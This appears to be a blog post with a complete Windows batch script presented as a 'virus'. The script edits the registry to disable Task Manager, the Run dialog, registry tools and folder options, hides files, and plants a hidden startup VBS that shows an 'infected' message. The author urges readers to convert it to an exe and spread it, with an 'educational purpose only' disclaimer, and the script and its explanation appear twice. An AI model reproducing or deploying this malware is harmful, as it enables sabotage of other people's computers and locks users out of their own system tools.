Most of the virus programmers disable some features of the registry like,
Disables the task manager…..Disables the Run…..etc.
Let’s take a look how do they done all these….
Here I’m making a bat file which will do all these…..it is easy to
Convert a bat file to exe using a bat to exe converter .
This bat file will disable Run, Registry editing, task manager, Folder options, hidden files/folders.
And it will produce a Error message whenever restarts the system….likeYour system infected
=======================================================================
ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableRegistryTools"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %WINDIR%\DXM.reg
echo "dxmv"="dxm.vbs" >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:0 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion] >> %WINDIR%\DXM.reg
echo "RegisteredOwner"="Mr. AkhilDas” >> %WINDIR%\DXM.reg
echo "RegisteredOrganization"="«« AkhlD™ »»" >> %WINDIR%\DXM.reg
echo. >> %WINDIR%\dxm.vbs
echo dxm=msgbox("Your system infected by «« AkhlD™ »» virus ",16,"iam_kingston@iamcrazy.in") >> %windir%\dxm.vbs
attrib +h +s +r %WINDIR%\dxm.vbs
start /w regedit /s %WINDIR%\DXM.reg
del %WINDIR%\DXM.reg
==========================================================================
This script actually makes a dxm.reg file in the windows directory and also makes dxm.vbs file in there.
It disables all the above functions…and put the dxm.vbs in the start up.
Now convert it to an exe file……spread it all around You!.....Enjoy ! [;)]
For Educational Purpose Only !
echo. >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] >> %WINDIR%\DXM.reg
echo "CheckedValue"=dword:0 >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableRegistryTools"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %WINDIR%\DXM.reg
echo "dxmv"="dxm.vbs" >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoRun"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:1 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> %WINDIR%\DXM.reg
echo "NoFolderOptions"=dword:0 >> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion] >> %WINDIR%\DXM.reg
echo "RegisteredOwner"="Mr. AkhilDas” >> %WINDIR%\DXM.reg
echo "RegisteredOrganization"="«« AkhlD™ »»" >> %WINDIR%\DXM.reg
echo. >> %WINDIR%\dxm.vbs
echo dxm=msgbox("Your system infected by «« AkhlD™ »» virus ",16,"iam_kingston@iamcrazy.in") >> %windir%\dxm.vbs
attrib +h +s +r %WINDIR%\dxm.vbs
start /w regedit /s %WINDIR%\DXM.reg
del %WINDIR%\DXM.reg
==========================================================================
This script actually makes a dxm.reg file in the windows directory and also makes dxm.vbs file in there.
It disables all the above functions…and put the dxm.vbs in the start up.
Now convert it to an exe file……spread it all around You!.....Enjoy ! [;)]
For Educational Purpose Only !
1 comments:
I can't Believe it's work
Post a Comment